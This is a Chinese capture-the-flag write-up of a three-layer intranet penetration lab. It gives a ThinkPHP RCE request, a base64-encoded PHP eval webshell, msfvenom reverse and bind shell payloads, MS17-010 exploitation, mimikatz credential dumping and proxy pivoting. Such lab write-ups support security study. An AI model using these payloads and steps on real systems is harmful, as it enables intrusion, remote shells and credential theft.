- 110分钟实现dotnet程序在linux下的持续部署_dotnet linux
- 2微博高并发场景下的分布式缓存架构_请求漂移
- 3人工智能(AI)、机器学习、深度学习 的关系_机器学习 深度学习 ai
- 42024年高职云计算实验室建设及云计算实训平台整体解决方案
- 5互联网大厂需要什么样的人才
- 6mac 关闭sip 保护系统_chmod: unable to change file mode on jetbrains.vmo
- 7Zookeeper 的 Leader 选举
- 8python的JSON用法——dumps的各种参数用法(详细)_json.dump()方法
- 9docker privileged作用_docker总结
- 10ERROR: Could not install packages due to an OSError: [Errno 2] No such file or directory解决方案
CFS三层靶机渗透记录_网络安全比赛的cfs靶场赛怎么玩
赞
踩
0x00 前言
这是 TeamsSix前辈出的一个三层内网渗透的靶场,偏向于CTF,但更类似于真实的渗透环境。通过一层一层的渗透,获取每个靶机的flag。
0x01 环境搭建
靶场获取:https://pan.baidu.com/s/1m3JoNfyxE-a96o7DMb1eLw 提取码:ht9o
- 1
靶场环境网络拓扑图:
导入虚拟机后,根据拓扑图进行网络配置或者自己设置。
targe1:172.12.200.153 192.168.22.128
targe2:192.168.22.129 192.168.33.128
targe3:192.168.33.129
0x02 target1
1、信息收集
首先简单的信息收集来一波,发现存在ThinkPHP-V5.0-RCE 远程代码执行漏洞。
端口服务:21、22、80、111、888、3306、8888
目录文件:
http://172.16.200.153/robots.txt(发现第一个flag)
http://172.16.200.153/index.php(ThinkPHP-V5.0-RCE-远程代码执行漏洞)
2、漏洞利用–Getshell:
确定漏洞是否存在payload:
http://172.16.200.153//index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
- 1
确定存在后开始写shell:
貌似被过滤了,后面用nc反弹的方法又写了一遍发现过滤了post
使用base64绕过试试:
payload:echo " PD9waHAgQGV2YWwoJF9QT1NUW3Bhc3NdKTs/Pg=="|base64 -d > a.php
- 1
成功写入后,使用工具连接一下小马儿,刚好发现了第二flag。
发现第三个flag:
3、边界机信息收集:
边界机信息收集:IP段 -->IP段主机存活 -->存活IP端口服务、敏感信息、帐号密码
系统版本信息:
由于172.16.200.0段是我自己的,所以主要探测192.168.22.0段的IP存活:
这里可以使用脚本进行探测,但考虑到后面的渗透。我感觉还是使用MSF比较方便。
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.16.200.139 lport=12345 -f elf -o 153.elf
- 1
使用msfvenom生成payload,之后上传到被控制服务器,给权限后执行获取session。
接下来探测192.168.22.0段的IP存活、端口服务,不过探测主机存活和端口前需要添加内网路由:
接下来使用auxiliary/scanner/portscan/tcp 探测主机存活:
结果扫描出192.168.22.128、192.168.22.129,其中128是本机,接下来扫描192.168.22.129的端口:
继续使用该模块扫描端口:
可以发现主机开放了21、22、80、888、3306、5555、8888端口,当然我们是也可以使用nmap进行扫描,不过扫描之前,需要使用auxiliary/server/socks4a模块,然后配置一下proxychain 代理:
Vi /etc/proxychains.conf
- 1
接下来就可以使用nmap 进行端口服务扫描了
Proxychains nmap -Pn -sT 192.168.22.129
0x03 target2
1、漏洞利用–Getshell
通过对内网129主机进行端口服务,目录等进行信息收集后,发现这里存在一个bagecms 3.1的内容管理系统,该版本存在多个高危漏洞。
找到一个提示点:
既然存在注入漏洞,那么就从注入漏洞下手,获取帐号密码,然后直接getshell.
获取帐号密码后,进入后台:
在模版中写入一句话木马,然后连接小马儿:
连接之前需要配置Proxifiler代理:
成功连接小马儿,并找到第二个flag。
2、边界机信息收集
接下来继续收集该主机的IP网段,端口服务。但是在这之前,需要先获取一个正向连接msf的shell。
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=54321 -f elf > 129.elf
- 1
然后上传木马,给权限执行,获取shell,当然这里需要使用代理重启一个msf。
加上前面两个,共有6个flag:
接下来添加路由,设置代理,继续搞内网。由于192.168.22.0段我们已经搞过了,这里需要探测的是192.168.33.0段。
使用之前的模块扫描IP存活和端口:
auxiliary/scanner/portscan/tcp
- 1
扫描后发现一个存活IP:192.168.33.129,还开放了445、3389,可能存在永恒之蓝。
0x04 target3
1、漏洞利用-MS17-010
使用了MSF的模块对它进行探测看看是否存在永恒之蓝。
auxiliary/scanner/smb/smb_ms17_010
- 1
确定存在后,使用下面的攻击模块进行攻击。
exploit/windows/smb/ms17_010_psexe
- 1
2、提权
提权–> 获取帐号密码
使用msf 自带的 mimikatz 获取帐号密码:
因为端口探测时已经知道3389是开放的了,这里直接把3389转发出来:
这里需要使用代理连接:
proxychains rdesktop 127.0.0.1:3389
- 1
输入帐号密码进入系统找flag,共有4个。如下图:
0x05 总结
利用点:
- ThinkPHP-V5.0-RCE 远程代码执行漏洞
- bagecms 3.1 sql注入漏洞、后台getshell
- ms17-010 漏洞
技术点:
- 使用编码绕过防护写入小马
- Msfvenonm生成木马
- MSF基本用法
- MSF-路由转发和代理配置
- MSF的内网主机探测
- MSF常用攻击模块使用等
